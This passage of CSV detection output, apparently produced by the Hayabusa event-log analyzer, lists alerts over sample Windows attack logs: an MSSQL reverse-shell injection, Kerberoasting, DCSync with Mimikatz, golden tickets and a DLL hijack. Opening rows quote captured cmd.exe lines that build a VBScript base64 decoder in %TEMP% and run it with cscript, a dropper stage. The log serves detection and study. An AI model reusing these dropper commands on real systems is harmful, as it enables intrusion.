mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ 
>>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.817 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.094 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_builtin/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:29.227 +00:00,mssql01.offsec.lan,4688,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 11:21:46.062 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.068 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.078 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.083 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.088 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.094 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from 
Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.100 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.110 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.117 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.153 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.166 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.181 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.181 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:33:06.521 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:33:06.523 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:33:06.523 +00:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:11.847 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:12.567 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:54.898 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:54.999 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.142 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.483 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.484 
+00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.625 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 12:02:34.103 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:35.117 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.166 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.200 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory 
Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.200 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.212 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.212 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.213 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.213 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:03.560 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 
0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:08.715 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:12.993 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:02.850 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.689 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.695 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.696 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.696 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.816 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:26:03.702 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:26:11.437 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 
12:26:20.424 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:02.387 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:19.056 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:19.742 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.566 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos 
Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.567 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.925 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.926 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 16:24:07.551 +00:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/image_load_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.558 +00:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-02 16:24:07.559 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 
747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.561 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.561 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 